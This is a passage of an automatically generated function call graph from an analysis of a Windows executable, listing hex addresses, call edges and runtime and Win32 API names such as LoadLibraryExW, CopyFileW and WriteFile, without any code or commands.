88420 901d10 59 API calls Mailbox 87468->88420 87469->87265 87470->87265 87471->87265 87472->87326 87473->87327 87475 901cf6 87474->87475 87478 901ba2 87474->87478 87475->87378 87476 901bae 87481 901bb9 87476->87481 87512 90c15c 48 API calls 87476->87512 87478->87476 87479 90f4ea 48 API calls 87478->87479 87480 9649c4 87479->87480 87482 90f4ea 48 API calls 87480->87482 87483 901c5d 87481->87483 87484 90f4ea 48 API calls 87481->87484 87489 9649cf 87482->87489 87483->87378 87485 901c9f 87484->87485 87486 901cb2 87485->87486 87511 8f2925 48 API calls 87485->87511 87486->87378 87488 90f4ea 48 API calls 87488->87489 87489->87476 87489->87488 87490->87378 87491->87336 87492->87374 87493->87378 87494->87392 87495->87350 87496->87373 87497->87382 87498->87388 87499->87390 87500->87388 87501->87378 87502->87378 87503->87378 87504->87375 87505->87392 87506->87392 87507->87371 87508->87392 87509->87392 87510->87378 87511->87486 87512->87481 87514 93fa1c __ftell_nolock 87513->87514 87515 93fa44 87514->87515 87717 8fd286 48 API calls 87514->87717 87614 8f936c 87515->87614 87518 93fa5e 87519 93fa80 87518->87519 87520 93fb68 87518->87520 87530 93fb92 87518->87530 87521 8f936c 82 API calls 87519->87521 87634 8f41a9 87520->87634 87528 93fa8c _wcscpy _wcschr 87521->87528 87524 93fb8e 87525 8f936c 82 API calls 87524->87525 87524->87530 87527 93fbc7 87525->87527 87526 8f41a9 136 API calls 87526->87524 87658 911dfc 87527->87658 87533 93fab0 _wcscat _wcscpy 87528->87533 87537 93fade _wcscat 87528->87537 87530->87402 87531 8f936c 82 API calls 87532 93fafc _wcscpy 87531->87532 87718 9372cb GetFileAttributesW 87532->87718 87535 8f936c 82 API calls 87533->87535 87534 93fbeb _wcscat _wcscpy 87542 8f936c 82 API calls 87534->87542 87535->87537 87537->87531 87538 93fb1c __NMSG_WRITE 87538->87530 87539 8f936c 82 API calls 87538->87539 87540 93fb48 87539->87540 87719 9360dd 77 API calls 4 library calls 87540->87719 87544 93fc82 87542->87544 87543 93fb5c 87543->87530 87661 93690b 87544->87661 87546 93fca2 87547 936524 3 API calls 87546->87547 87548 93fcb1 87547->87548 87549 8f936c 82 API calls 87548->87549 87551 93fce2 87548->87551 87550 93fccb 87549->87550 87667 93bfa4 87550->87667 87553 8f4252 84 API calls 87551->87553 87553->87530 87555 8f425c 87554->87555 87559 8f4263 87554->87559 87556 9135e4 __fcloseall 83 API calls 87555->87556 87556->87559 87557 8f4283 FreeLibrary 87558 8f4272 87557->87558 87558->87402 87559->87557 87559->87558 87561 8f936c 82 API calls 87560->87561 87562 94702a 87561->87562 88350 8fb470 87562->88350 87564 94703a 87565 94705f 87564->87565 87566 8ffe30 332 API calls 87564->87566 87568 947063 87565->87568 88378 8fcdb9 48 API calls 87565->88378 87566->87565 87568->87402 88407 936ca9 GetFileAttributesW 87569->88407 87572->87404 87574 94e84e 87573->87574 87575 94e868 87573->87575 88411 93cc5c 87 API calls 4 library calls 87574->88411 88412 94ccdc 48 API calls 87575->88412 87578 94e871 87579 8ffe30 331 API calls 87578->87579 87580 94e8cf 87579->87580 87581 94e96a 87580->87581 87582 94e916 87580->87582 87595 94e860 Mailbox 87580->87595 87583 94e978 87581->87583 87586 94e9c7 87581->87586 88413 939b72 48 API calls 87582->88413 88414 93a69d 48 API calls 87583->88414 87585 94e949 87588 9045e0 331 API calls 87585->87588 87589 8f936c 82 API calls 87586->87589 87586->87595 87588->87595 87592 94e9e1 87589->87592 87590 94e99b 88415 8fbc74 48 API calls 87590->88415 87594 8fbdfa 48 API calls 87592->87594 87593 94e9a3 Mailbox 87597 903200 331 API calls 87593->87597 87596 94ea05 CharUpperBuffW 87594->87596 87595->87401 87598 94ea1f 87596->87598 87597->87595 87599 94ea72 87598->87599 87600 94ea26 87598->87600 87601 8f936c 82 API calls 87599->87601 88416 939b72 48 API calls 87600->88416 87602 94ea7a 87601->87602 88417 8f1caa 49 API calls 87602->88417 87605 94ea54 87606 9045e0 331 API calls 87605->87606 87606->87595 87607 94ea84 87607->87595 87608 8f936c 82 API calls 87607->87608 87609 94ea9f 87608->87609 88418 8fbc74 48 API calls 87609->88418 87611 94eaaf 87612 903200 331 API calls 87611->87612 87612->87595 87613->87402 87615 8f9384 87614->87615 87616 8f9380 87614->87616 87617 964cbd __i64tow 87615->87617 87618 8f9398 87615->87618 87619 964bbf 87615->87619 87626 8f93b0 __itow Mailbox _wcscpy 87615->87626 87616->87518 87720 91172b 81 API calls 3 library calls 87618->87720 87620 964ca5 87619->87620 87621 964bc8 87619->87621 87721 91172b 81 API calls 3 library calls 87620->87721 87621->87626 87627 964be7 87621->87627 87623 90f4ea 48 API calls 87625 8f93ba 87623->87625 87625->87616 87629 8fce19 48 API calls 87625->87629 87626->87623 87628 90f4ea 48 API calls 87627->87628 87630 964c04 87628->87630 87629->87616 87631 90f4ea 48 API calls 87630->87631 87632 964c2a 87631->87632 87632->87616 87633 8fce19 48 API calls 87632->87633 87633->87616 87722 8f4214 87634->87722 87639 964f73 87641 8f4252 84 API calls 87639->87641 87640 8f41d4 LoadLibraryExW 87732 8f4291 87640->87732 87643 964f7a 87641->87643 87645 8f4291 3 API calls 87643->87645 87648 964f82 87645->87648 87647 8f41fb 87647->87648 87649 8f4207 87647->87649 87758 8f44ed 87648->87758 87650 8f4252 84 API calls 87649->87650 87652 8f420c 87650->87652 87652->87524 87652->87526 87655 964fa9 87766 8f4950 87655->87766 87991 911e46 87658->87991 87662 936918 _wcschr __ftell_nolock 87661->87662 87663 911dfc __wsplitpath 47 API calls 87662->87663 87666 93692e _wcscat _wcscpy 87662->87666 87664 93695d 87663->87664 87665 911dfc __wsplitpath 47 API calls 87664->87665 87665->87666 87666->87546 87668 93bfb1 __ftell_nolock 87667->87668 87669 90f4ea 48 API calls 87668->87669 87670 93c00e 87669->87670 87671 8f47b7 48 API calls 87670->87671 87672 93c018 87671->87672 87673 93bdb4 GetSystemTimeAsFileTime 87672->87673 87674 93c023 87673->87674 87675 8f4517 83 API calls 87674->87675 87676 93c036 _wcscmp 87675->87676 87677 93c107 87676->87677 87678 93c05a 87676->87678 87679 93c56d 94 API calls 87677->87679 88047 93c56d 87678->88047 87696 93c0d3 _wcscat 87679->87696 87682 911dfc __wsplitpath 47 API calls 87687 93c088 _wcscat _wcscpy 87682->87687 87683 8f44ed 64 API calls 87684 93c12c 87683->87684 87685 8f44ed 64 API calls 87684->87685 87688 93c13c 87685->87688 87686 93c110 87686->87551 87690 911dfc __wsplitpath 47 API calls 87687->87690 87689 8f44ed 64 API calls 87688->87689 87691 93c157 87689->87691 87690->87696 87692 8f44ed 64 API calls 87691->87692 87693 93c167 87692->87693 87694 8f44ed 64 API calls 87693->87694 87695 93c182 87694->87695 87697 8f44ed 64 API calls 87695->87697 87696->87683 87696->87686 87698 93c192 87697->87698 87699 8f44ed 64 API calls 87698->87699 87700 93c1a2 87699->87700 87701 8f44ed 64 API calls 87700->87701 87702 93c1b2 87701->87702 88017 93c71a GetTempPathW GetTempFileNameW 87702->88017 87704 93c1be 87705 913499 117 API calls 87704->87705 87707 93c1cf 87705->87707 87707->87686 87709 8f44ed 64 API calls 87707->87709 87716 93c289 87707->87716 88018 912aae 87707->88018 87708 93c294 87708->87686 87710 93c342 CopyFileW 87708->87710 87711 93c2b8 87708->87711 87709->87707 87710->87686 87712 93c32d 87710->87712 88053 93b965 87711->88053 87712->87686 88044 93c6d9 CreateFileW 87712->88044 88031 9135e4 87716->88031 87717->87515 87718->87538 87719->87543 87720->87626 87721->87626 87771 8f4339 87722->87771 87726 8f41bb 87729 913499 87726->87729 87727 8f4244 FreeLibrary 87727->87726 87728 8f423c 87728->87726 87728->87727 87779 9134ae 87729->87779 87731 8f41c8 87731->87639 87731->87640 87902 8f42e4 87732->87902 87735 8f41ec 87739 8f4380 87735->87739 87736 8f42c1 FreeLibrary 87736->87735 87738 8f42b8 87738->87735 87738->87736 87740 90f4ea 48 API calls 87739->87740 87741 8f4395 87740->87741 87910 8f47b7 87741->87910 87743 8f43a1 ___crtGetEnvironmentStringsW 87744 8f43dc 87743->87744 87746 8f4499 87743->87746 87747 8f44d1 87743->87747 87745 8f4950 57 API calls 87744->87745 87755 8f43e5 87745->87755 87913 8f406b CreateStreamOnHGlobal 87746->87913 87924 93c750 93 API calls 87747->87924 87750 8f44ed 64 API calls 87750->87755 87752 8f4479 87752->87647 87753 964ed7 87754 8f4517 83 API calls 87753->87754 87756 964eeb 87754->87756 87755->87750 87755->87752 87755->87753 87919 8f4517 87755->87919 87757 8f44ed 64 API calls 87756->87757 87757->87752 87759 8f44ff 87758->87759 87762 964fc0 87758->87762 87948 91381e 87759->87948 87763 93bf5a 87968 93bdb4 87763->87968 87765 93bf70 87765->87655 87767 8f495f 87766->87767 87768 965002 87766->87768 87973 913e65 87767->87973 87770 8f4967 87775 8f434b 87771->87775 87774 8f4321 LoadLibraryA GetProcAddress 87774->87728 87776 8f422f 87775->87776 87777 8f4354 LoadLibraryA 87775->87777 87776->87728 87776->87774 87777->87776 87778 8f4365 GetProcAddress 87777->87778 87778->87776 87781 9134ba _wprintf 87779->87781 87780 9134cd 87827 917c0e 47 API calls __getptd_noexit 87780->87827 87781->87780 87783 9134fe 87781->87783 87798 91e4c8 87783->87798 87784 9134d2 87828 916e10 8 API calls _W_expandtime 87784->87828 87787 913503 87788 913519 87787->87788 87789 91350c 87787->87789 87791 913543 87788->87791 87792 913523 87788->87792 87829 917c0e 47 API calls __getptd_noexit 87789->87829 87812 91e5e0 87791->87812 87830 917c0e 47 API calls __getptd_noexit 87792->87830 87794 9134dd _wprintf @_EH4_CallFilterFunc@8 87794->87731 87799 91e4d4 _wprintf 87798->87799 87832 917cf4 87799->87832 87801 91e552 87839 91e5d7 87801->87839 87802 91e559 87868 9169d0 47 API calls std::exception::_Copy_str 87802->87868 87805 91e5cc _wprintf 87805->87787 87806 91e560 87806->87801 87807 91e56f InitializeCriticalSectionAndSpinCount EnterCriticalSection 87806->87807 87807->87801 87810 91e4e2 87810->87801 87810->87802 87842 917d7c 87810->87842 87866 914e5b 48 API calls __lock 87810->87866 87867 914ec5 LeaveCriticalSection LeaveCriticalSection _doexit 87810->87867 87813 91e600 __wopenfile 87812->87813 87814 91e61a 87813->87814 87826 91e7d5 87813->87826 87888 91185b 59 API calls 2 library calls 87813->87888 87886 917c0e 47 API calls __getptd_noexit 87814->87886 87816 91e61f 87887 916e10 8 API calls _W_expandtime 87816->87887 87818 91e838 87883 9263c9 87818->87883 87820 91354e 87831 913570 LeaveCriticalSection LeaveCriticalSection _fseek 87820->87831 87822 91e7ce 87822->87826 87889 91185b 59 API calls 2 library calls 87822->87889 87824 91e7ed 87824->87826 87890 91185b 59 API calls 2 library calls 87824->87890 87826->87814 87826->87818 87827->87784 87828->87794 87829->87794 87830->87794 87831->87794 87833 917d05 87832->87833 87834 917d18 EnterCriticalSection 87832->87834 87835 917d7c __mtinitlocknum 46 API calls 87833->87835 87834->87810 87836 917d0b 87835->87836 87836->87834 87869 91115b 47 API calls 3 library calls 87836->87869 87870 917e58 LeaveCriticalSection 87839->87870 87841 91e5de 87841->87805 87843 917d88 _wprintf 87842->87843 87844 917d91 87843->87844 87845 917da9 87843->87845 87871 9181c2 47 API calls __NMSG_WRITE 87844->87871 87852 917e11 _wprintf 87845->87852 87858 917da7 87845->87858 87847 917d96 87872 91821f 47 API calls 5 library calls 87847->87872 87850 917dbd 87853 917dd3 87850->87853 87854 917dc4 87850->87854 87851 917d9d 87873 911145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 87851->87873 87852->87810 87857 917cf4 __lock 46 API calls 87853->87857 87875 917c0e 47 API calls __getptd_noexit 87854->87875 87860 917dda 87857->87860 87858->87845 87874 9169d0 47 API calls std::exception::_Copy_str 87858->87874 87859 917dc9 87859->87852 87861 917de9 InitializeCriticalSectionAndSpinCount 87860->87861 87862 917dfe 87860->87862 87863 917e04 87861->87863 87876 911c9d 87862->87876 87882 917e1a LeaveCriticalSection _doexit 87863->87882 87866->87810 87867->87810 87868->87806 87870->87841 87871->87847 87872->87851 87874->87850 87875->87859 87877 911ca6 RtlFreeHeap 87876->87877 87881 911ccf _free 87876->87881 87878 911cbb 87877->87878 87877->87881 87879 917c0e _W_expandtime 45 API calls 87878->87879 87880 911cc1 GetLastError 87879->87880 87880->87881 87881->87863 87882->87852 87891 925bb1 87883->87891 87885 9263e2 87885->87820 87886->87816 87887->87820 87888->87822 87889->87824 87890->87826 87894 925bbd _wprintf 87891->87894 87892 925bcf 87893 917c0e _W_expandtime 47 API calls 87892->87893 87895 925bd4 87893->87895 87894->87892 87896 925c06 87894->87896 87897 916e10 _W_expandtime 8 API calls 87895->87897 87898 925c78 __wsopen_helper 110 API calls 87896->87898 87901 925bde _wprintf 87897->87901 87899 925c23 87898->87899 87900 925c4c __wsopen_helper LeaveCriticalSection 87899->87900 87900->87901 87901->87885 87906 8f42f6 87902->87906 87905 8f42cc LoadLibraryA GetProcAddress 87905->87738 87907 8f42aa 87906->87907 87908 8f42ff LoadLibraryA 87906->87908 87907->87738 87907->87905 87908->87907 87909 8f4310 GetProcAddress 87908->87909 87909->87907 87911 90f4ea 48 API calls 87910->87911 87912 8f47c9 87911->87912 87912->87743 87914 8f4085 FindResourceExW 87913->87914 87916 8f40a2 87913->87916 87915 964f16 LoadResource 87914->87915 87914->87916 87915->87916 87917 964f2b SizeofResource 87915->87917 87916->87744 87917->87916 87918 964f3f LockResource 87917->87918 87918->87916 87920 8f4526 87919->87920 87923 964fe0 87919->87923 87925 913a8d 87920->87925 87922 8f4534 87922->87755 87924->87744 87926 913a99 _wprintf 87925->87926 87927 913aa7 87926->87927 87928 913acd 87926->87928 87938 917c0e 47 API calls __getptd_noexit 87927->87938 87940 914e1c 87928->87940 87931 913aac 87939 916e10 8 API calls _W_expandtime 87931->87939 87935 913ae2 87947 913b04 LeaveCriticalSection LeaveCriticalSection _fseek 87935->87947 87937 913ab7 _wprintf 87937->87922 87938->87931 87939->87937 87941 914e2c 87940->87941 87942 914e4e EnterCriticalSection 87940->87942 87941->87942 87944 914e34 87941->87944 87943 913ad3 87942->87943 87946 9139fe 81 API calls 5 library calls 87943->87946 87945 917cf4 __lock 47 API calls 87944->87945 87945->87943 87946->87935 87947->87937 87951 913839 87948->87951 87950 8f4510 87950->87763 87952 913845 _wprintf 87951->87952 87953 913880 _wprintf 87952->87953 87954 913888 87952->87954 87955 91385b _memset 87952->87955 87953->87950 87956 914e1c __lock_file 48 API calls 87954->87956 87964 917c0e 47 API calls __getptd_noexit 87955->87964 87958 91388e 87956->87958 87966 91365b 62 API calls 4 library calls 87958->87966 87959 913875 87965 916e10 8 API calls _W_expandtime 87959->87965 87962 9138a4 87967 9138c2 LeaveCriticalSection LeaveCriticalSection _fseek 87962->87967 87964->87959 87965->87953 87966->87962 87967->87953 87971 91344a GetSystemTimeAsFileTime 87968->87971 87970 93bdc3 87970->87765 87972 913478 __aulldiv 87971->87972 87972->87970 87974 913e71 _wprintf 87973->87974 87975 913e94 87974->87975 87976 913e7f 87974->87976 87978 914e1c __lock_file 48 API calls 87975->87978 87987 917c0e 47 API calls __getptd_noexit 87976->87987 87980 913e9a 87978->87980 87979 913e84 87988 916e10 8 API calls _W_expandtime 87979->87988 87989 913b0c 55 API calls 6 library calls 87980->87989 87983 913ea5 87990 913ec5 LeaveCriticalSection LeaveCriticalSection _fseek 87983->87990 87985 913eb7 87986 913e8f _wprintf 87985->87986 87986->87770 87987->87979 87988->87986 87989->87983 87990->87985 87992 911e61 87991->87992 87995 911e55 87991->87995 88015 917c0e 47 API calls __getptd_noexit 87992->88015 87994 912019 87999 911e41 87994->87999 88016 916e10 8 API calls _W_expandtime 87994->88016 87995->87992 88001 911ed4 87995->88001 88010 919d6b 47 API calls _W_expandtime 87995->88010 87998 911fa0 87998->87992 87998->87999 88002 911fb0 87998->88002 87999->87534 88000 911f5f 88000->87992 88003 911f7b 88000->88003 88012 919d6b 47 API calls _W_expandtime 88000->88012 88001->87992 88009 911f41 88001->88009 88011 919d6b 47 API calls _W_expandtime 88001->88011 88014 919d6b 47 API calls _W_expandtime 88002->88014 88003->87992 88003->87999 88005 911f91 88003->88005 88013 919d6b 47 API calls _W_expandtime 88005->88013 88009->87998 88009->88000 88010->88001 88011->88009 88012->88003 88013->87999 88014->87999 88015->87994 88016->87999 88017->87704 88019 912aba _wprintf 88018->88019 88020 912ad4 88019->88020 88021 912aec 88019->88021 88022 912ae4 _wprintf 88019->88022 88096 917c0e 47 API calls __getptd_noexit 88020->88096 88023 914e1c __lock_file 48 API calls 88021->88023 88022->87707 88025 912af2 88023->88025 88084 912957 88025->88084 88026 912ad9 88097 916e10 8 API calls _W_expandtime 88026->88097 88032 9135f0 _wprintf 88031->88032 88033 913604 88032->88033 88034 91361c 88032->88034 88270 917c0e 47 API calls __getptd_noexit 88033->88270 88036 913614 _wprintf 88034->88036 88037 914e1c __lock_file 48 API calls 88034->88037 88036->87708 88039 91362e 88037->88039 88038 913609 88271 916e10 8 API calls _W_expandtime 88038->88271 88254 913578 88039->88254 88045 93c715 88044->88045 88046 93c6ff SetFileTime CloseHandle 88044->88046 88045->87686 88046->88045 88052 93c581 __tzset_nolock _wcscmp 88047->88052 88048 8f44ed 64 API calls 88048->88052 88049 93c05f 88049->87682 88049->87686 88050 93bf5a GetSystemTimeAsFileTime 88050->88052 88051 8f4517 83 API calls 88051->88052 88052->88048 88052->88049 88052->88050 88052->88051 88054 93b970 88053->88054 88055 93b97e 88053->88055 88056 913499 117 API calls 88054->88056 88057 93b9c3 88055->88057 88058 913499 117 API calls 88055->88058 88083 93b987 88055->88083 88056->88055 88339 93bbe8 64 API calls 3 library calls 88057->88339 88060 93b9a8 88058->88060 88060->88057 88062 93b9b1 88060->88062 88061 93ba07 88063 93ba0b 88061->88063 88064 93ba2c 88061->88064 88066 9135e4 __fcloseall 83 API calls 88062->88066 88062->88083 88065 93ba18 88063->88065 88068 9135e4 __fcloseall 83 API calls 88063->88068 88340 93b7e5 47 API calls std::exception::_Copy_str 88064->88340 88070 9135e4 __fcloseall 83 API calls 88065->88070 88065->88083 88066->88083 88068->88065 88069 93ba34 88071 93ba5a 88069->88071 88072 93ba3a 88069->88072 88070->88083 88341 93ba8a 90 API calls 88071->88341 88073 93ba47 88072->88073 88075 9135e4 __fcloseall 83 API calls 88072->88075 88077 9135e4 __fcloseall 83 API calls 88073->88077 88073->88083 88075->88073 88076 93ba61 88342 93bb64 88076->88342 88077->88083 88080 93ba75 88082 9135e4 __fcloseall 83 API calls 88080->88082 88080->88083 88081 9135e4 __fcloseall 83 API calls 88081->88080 88082->88083 88083->87712 88087 912966 88084->88087 88091 912984 88084->88091 88085 912974 88131 917c0e 47 API calls __getptd_noexit 88085->88131 88087->88085 88087->88091 88094 91299c ___crtGetEnvironmentStringsW 88087->88094 88088 912979 88132 916e10 8 API calls _W_expandtime 88088->88132 88098 912b24 LeaveCriticalSection LeaveCriticalSection _fseek 88091->88098 88094->88091 88099 912933 88094->88099 88106 91af61 88094->88106 88133 912c84 88094->88133 88139 918e63 78 API calls 7 library calls 88094->88139 88096->88026 88097->88022 88098->88022 88100 912952 88099->88100 88101 91293d 88099->88101 88100->88094 88140 917c0e 47 API calls __getptd_noexit 88101->88140 88103 912942 88141 916e10 8 API calls _W_expandtime 88103->88141 88105 91294d 88105->88094 88107 91af6d _wprintf 88106->88107 88108 91af75 88107->88108 88109 91af8d 88107->88109 88215 917bda 47 API calls __getptd_noexit 88108->88215 88110 91b022 88109->88110 88115 91afbf 88109->88115 88220 917bda 47 API calls __getptd_noexit 88110->88220 88113 91af7a 88216 917c0e 47 API calls __getptd_noexit 88113->88216 88114 91b027 88221 917c0e 47 API calls __getptd_noexit 88114->88221 88142 91a8ed 88115->88142 88117 91af82 _wprintf 88117->88094 88120 91b02f 88222 916e10 8 API calls _W_expandtime 88120->88222 88121 91afc5 88123 91afd8 88121->88123 88124 91afeb 88121->88124 88151 91b043 88123->88151 88217 917c0e 47 API calls __getptd_noexit 88124->88217 88127 91afe4 88219 91b01a LeaveCriticalSection __unlock_fhandle 88127->88219 88128 91aff0 88218 917bda 47 API calls __getptd_noexit 88128->88218 88131->88088 88132->88091 88134 912c97 88133->88134 88138 912cbb 88133->88138 88135 912933 __filbuf 47 API calls 88134->88135 88134->88138 88136 912cb4 88135->88136 88137 91af61 __flush 78 API calls 88136->88137 88137->88138 88138->88094 88139->88094 88140->88103 88141->88105 88143 91a8f9 _wprintf 88142->88143 88144 91a946 EnterCriticalSection 88143->88144 88145 917cf4 __lock 47 API calls 88143->88145 88146 91a96c _wprintf 88144->88146 88147 91a91d 88145->88147 88146->88121 88148 91a928 InitializeCriticalSectionAndSpinCount 88147->88148 88149 91a93a 88147->88149 88148->88149 88223 91a970 LeaveCriticalSection _doexit 88149->88223 88152 91b050 __ftell_nolock 88151->88152 88153 91b08d 88152->88153 88154 91b0ac 88152->88154 88183 91b082 88152->88183 88233 917bda 47 API calls __getptd_noexit 88153->88233 88157 91b105 88154->88157 88158 91b0e9 88154->88158 88162 91b11c 88157->88162 88239 91f82f 49 API calls 3 library calls 88157->88239 88236 917bda 47 API calls __getptd_noexit 88158->88236 88159 91b86b 88159->88127 88160 91b092 88234 917c0e 47 API calls __getptd_noexit 88160->88234 88224 923bf2 88162->88224 88164 91b0ee 88237 917c0e 47 API calls __getptd_noexit 88164->88237 88166 91b099 88235 916e10 8 API calls _W_expandtime 88166->88235 88168 91b12a 88171 91b44b 88168->88171 88240 917a0d 47 API calls 2 library calls 88168->88240 88173 91b463 88171->88173 88174 91b7b8 WriteFile 88171->88174 88172 91b0f5 88238 916e10 8 API calls _W_expandtime 88172->88238 88177 91b55a 88173->88177 88185 91b479 88173->88185 88178 91b7e1 GetLastError 88174->88178 88182 91b410 88174->88182 88189 91b565 88177->88189 88191 91b663 88177->88191 88178->88182 88179 91b150 GetConsoleMode 88179->88171 88181 91b189 88179->88181 88180 91b81b 88180->88183 88245 917c0e 47 API calls __getptd_noexit 88180->88245 88181->88171 88184 91b199 GetConsoleCP 88181->88184 88182->88180 88182->88183 88188 91b7f7 88182->88188 88247 91a70c 88183->88247 88184->88182 88213 91b1c2 88184->88213 88185->88180 88186 91b4e9 WriteFile 88185->88186 88186->88178 88190 91b526 88186->88190 88194 91b812 88188->88194 88195 91b7fe 88188->88195 88189->88180 88196 91b5de WriteFile 88189->88196 88190->88182 88190->88185 88201 91b555 88190->88201 88191->88180 88197 91b6d8 WideCharToMultiByte 88191->88197 88192 91b843 88246 917bda 47 API calls __getptd_noexit 88192->88246 88244 917bed 47 API calls 3 library calls 88194->88244 88242 917c0e 47 API calls __getptd_noexit 88195->88242 88196->88178 88200 91b62d 88196->88200 88197->88178 88207 91b71f 88197->88207 88200->88182 88200->88189 88200->88201 88201->88182 88202 91b803 88243 917bda 47 API calls __getptd_noexit 88202->88243 88203 91b727 WriteFile 88205 91b77a GetLastError 88203->88205 88203->88207 88205->88207 88207->88182 88207->88191 88207->88201 88207->88203 88208 925884 WriteConsoleW CreateFileW __chsize_nolock 88211 91b2f6 88208->88211 88209 9240f7 59 API calls __chsize_nolock 88209->88213 88210 91b28f WideCharToMultiByte 88210->88182 88212 91b2ca WriteFile 88210->88212 88211->88178 88211->88182 88211->88208 88211->88213 88214 91b321 WriteFile 88211->88214 88212->88178 88212->88211 88213->88182 88213->88209 88213->88210 88213->88211 88241 911688 57 API calls __isleadbyte_l 88213->88241 88214->88178 88214->88211 88215->88113 88216->88117 88217->88128 88218->88127 88219->88117 88220->88114 88221->88120 88222->88117 88223->88144 88225 923bfd 88224->88225 88227 923c0a 88224->88227 88226 917c0e _W_expandtime 47 API calls 88225->88226 88228 923c02 88226->88228 88229 923c16 88227->88229 88230 917c0e _W_expandtime 47 API calls 88227->88230 88228->88168 88229->88168 88231 923c37 88230->88231 88232 916e10 _W_expandtime 8 API calls 88231->88232 88232->88228 88233->88160 88234->88166 88235->88183 88236->88164 88237->88172 88238->88183 88239->88162 88240->88179 88241->88213 88242->88202 88243->88183 88244->88183 88245->88192 88246->88183 88248 91a714 88247->88248 88249 91a716 IsProcessorFeaturePresent 88247->88249 88248->88159 88251 9237b0 88249->88251 88252 92375f ___raise_securityfailure 5 API calls 88251->88252 88253 923893 88252->88253 88253->88159 88255 913587 88254->88255 88256 91359b 88254->88256 88300 917c0e 47 API calls __getptd_noexit 88255->88300 88259 912c84 __flush 78 API calls 88256->88259 88268 913597 88256->88268 88258 91358c 88301 916e10 8 API calls _W_expandtime 88258->88301 88261 9135a7 88259->88261 88273 91eb36 88261->88273 88264 912933 __filbuf 47 API calls 88265 9135b5 88264->88265 88277 91e9d2 88265->88277 88267 9135bb 88267->88268 88269 911c9d _free 47 API calls 88267->88269 88272 913653 LeaveCriticalSection LeaveCriticalSection _fseek 88268->88272 88269->88268 88270->88038 88271->88036 88272->88036 88274 9135af 88273->88274 88275 91eb43 88273->88275 88274->88264 88275->88274 88276 911c9d _free 47 API calls 88275->88276 88276->88274 88278 91e9de _wprintf 88277->88278 88279 91e9e6 88278->88279 88280 91e9fe 88278->88280 88317 917bda 47 API calls __getptd_noexit 88279->88317 88281 91ea7b 88280->88281 88287 91ea28 88280->88287 88321 917bda 47 API calls __getptd_noexit 88281->88321 88284 91e9eb 88318 917c0e 47 API calls __getptd_noexit 88284->88318 88286 91ea80 88322 917c0e 47 API calls __getptd_noexit 88286->88322 88289 91a8ed ___lock_fhandle 49 API calls 88287->88289 88291 91ea2e 88289->88291 88290 91ea88 88323 916e10 8 API calls _W_expandtime 88290->88323 88294 91ea41 88291->88294 88295 91ea4c 88291->88295 88293 91e9f3 _wprintf 88293->88267 88302 91ea9c 88294->88302 88319 917c0e 47 API calls __getptd_noexit 88295->88319 88298 91ea47 88320 91ea73 LeaveCriticalSection __unlock_fhandle 88298->88320 88300->88258 88301->88268 88324 91aba4 88302->88324 88304 91eb00 88337 91ab1e 48 API calls 2 library calls 88304->88337 88305 91eaaa 88305->88304 88306 91eade 88305->88306 88308 91aba4 __close_nolock 47 API calls 88305->88308 88306->88304 88309 91aba4 __close_nolock 47 API calls 88306->88309 88311 91ead5 88308->88311 88312 91eaea CloseHandle 88309->88312 88310 91eb08 88313 91eb2a 88310->88313 88338 917bed 47 API calls 3 library calls 88310->88338 88315 91aba4 __close_nolock 47 API calls 88311->88315 88312->88304 88316 91eaf6 GetLastError 88312->88316 88313->88298 88315->88306 88316->88304 88317->88284 88318->88293 88319->88298 88320->88293 88321->88286 88322->88290 88323->88293 88325 91abc4 88324->88325 88326 91abaf 88324->88326 88329 917bda __dosmaperr 47 API calls 88325->88329 88331 91abe9 88325->88331 88327 917bda __dosmaperr 47 API calls 88326->88327 88328 91abb4 88327->88328 88330 917c0e _W_expandtime 47 API calls 88328->88330 88332 91abf3 88329->88332 88333 91abbc 88330->88333 88331->88305 88334 917c0e _W_expandtime 47 API calls 88332->88334 88333->88305 88335 91abfb 88334->88335 88336 916e10 _W_expandtime 8 API calls 88335->88336 88336->88333 88337->88310 88338->88313 88339->88061 88340->88069 88341->88076 88343 93bb71 88342->88343 88344 93bb77 88342->88344 88346 911c9d _free 47 API calls 88343->88346 88345 93bb88 88344->88345 88347 911c9d _free 47 API calls 88344->88347 88348 93ba68 88345->88348 88349 911c9d _free 47 API calls 88345->88349 88346->88344 88347->88345 88348->88080 88348->88081 88349->88348 88379 8f6b0f 88350->88379 88352 8fb69b 88391 8fba85 88352->88391 88354 8fb6b5 Mailbox 88354->87564 88357 963939 ___crtGetEnvironmentStringsW 88404 9326bc 89 API calls 4 library calls 88357->88404 88358 8fbcce 48 API calls 88362 8fb495 88358->88362 88359 96397b 88405 9326bc 89 API calls 4 library calls 88359->88405 88362->88352 88362->88357 88362->88358 88362->88359 88364 8fba85 48 API calls 88362->88364 88369 8fb9e4 88362->88369 88370 963909 88362->88370 88375 8fbdfa 48 API calls 88362->88375 88384 8fc413 59 API calls 88362->88384 88385 8fbb85 88362->88385 88390 8fbc74 48 API calls 88362->88390 88399 8fc6a5 49 API calls 88362->88399 88400 8fc799 48 API calls ___crtGetEnvironmentStringsW 88362->88400 88364->88362 88366 963989 88368 8fba85 48 API calls 88366->88368 88367 963973 88367->88354 88368->88367 88406 9326bc 89 API calls 4 library calls 88369->88406 88401 8f6b4a 88370->88401 88373 963914 88377 90f4ea 48 API calls 88373->88377 88376 8fb66c CharUpperBuffW 88375->88376 88376->88362 88377->88357 88378->87568 88380 90f4ea 48 API calls 88379->88380 88381 8f6b34 88380->88381 88382 8f6b4a 48 API calls 88381->88382 88383 8f6b43 88382->88383 88383->88362 88384->88362 88386 8fbb9b 88385->88386 88389 8fbb96 ___crtGetEnvironmentStringsW 88385->88389 88387 90ee75 48 API calls 88386->88387 88388 961b77 88386->88388 88387->88389 88388->88388 88389->88362 88390->88362 88392 8fbb25 88391->88392 88397 8fba98 ___crtGetEnvironmentStringsW 88391->88397 88394 90f4ea 48 API calls 88392->88394 88393 90f4ea 48 API calls 88395 8fba9f 88393->88395 88394->88397 88396 8fbac8 88395->88396 88398 90f4ea 48 API calls 88395->88398 88396->88354 88397->88393 88398->88396 88399->88362 88400->88362 88402 90f4ea 48 API calls 88401->88402 88403 8f6b54 88402->88403 88403->88373 88404->88367 88405->88366 88406->88367 88408 936529 88407->88408 88409 936cc4 FindFirstFileW 88407->88409 88408->87402 88409->88408 88410 936cd9 FindClose 88409->88410 88410->88408 88411->87595 88412->87578 88413->87585 88414->87590 88415->87593 88416->87605 88417->87607 88418->87611 88419->87468 88420->87468 88421->87467 88422->87467 88423->87460 88424->87455 88425->87466 88426->87286 88427->87286 88428->87287 88429->87296 88430->87301 88431 969bec 